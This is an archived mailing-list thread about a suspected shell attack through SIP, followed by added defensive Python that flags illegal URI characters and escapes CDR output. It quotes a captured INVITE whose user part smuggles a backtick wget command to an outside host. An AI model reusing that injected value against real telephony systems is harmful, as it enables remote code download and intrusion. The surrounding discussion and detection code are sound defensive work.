* You are viewing the archive for September 11th, 2011

new sort of shell attack attempt via SIP?

On 09/11/2011 07:05 PM, Tom Browning wrote:

> INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0.

My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link.

A more sophisticated variant of that would embed
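
Added example, not part of the original thread: a check that flags a request line like the one quoted above because a backtick is not a legal character in SIP URI userinfo under the RFC 3261 grammar, plus output escaping for a CDR viewer of the kind the reply guesses at. The function names `illegal_userinfo_chars` and `cdr_cell` are hypothetical, and the benign request lines are constructed.

```python
import html
import re

# One legal unit of SIP URI userinfo per RFC 3261: an unreserved, mark or
# user-unreserved character, the user:password separator, or a %XX escape.
_LEGAL = re.compile(r"[A-Za-z0-9\-_.!~*'()&=+$,;?/:]|%[0-9A-Fa-f]{2}")

# Request line quoted in the post, joined onto one line.
POSTED = ("INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20"
          "http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.")
# Constructed benign request lines for comparison.
BENIGN = ["INVITE sip:+15551230000@pbx.example.invalid SIP/2.0",
          "OPTIONS sip:pbx.example.invalid SIP/2.0"]


def illegal_userinfo_chars(request_line):
    """Return the sorted characters in the Request-URI userinfo that the
    SIP URI grammar does not allow; an empty list means nothing to flag."""
    parts = request_line.strip().split(" ")
    if len(parts) < 3 or not parts[-1].startswith("SIP/"):
        raise ValueError("not a SIP request line")
    uri = " ".join(parts[1:-1])   # keep stray spaces so they get flagged too
    scheme, _, rest = uri.partition(":")
    if scheme.lower() not in ("sip", "sips") or "@" not in rest:
        return []                 # no userinfo to inspect
    userinfo = rest.rsplit("@", 1)[0]
    return sorted(set(_LEGAL.sub("", userinfo)))


def cdr_cell(value):
    """Render an untrusted CDR field as inert text inside an HTML table cell."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


if __name__ == "__main__":
    for line in [POSTED] + BENIGN:
        print(illegal_userinfo_chars(line), line)
    print(cdr_cell('0012"><a href="http://example.invalid/">x</a>'))
```

A `%60` escape is grammar-legal and passes this check, so any component that decodes the user part before using it needs its own handling.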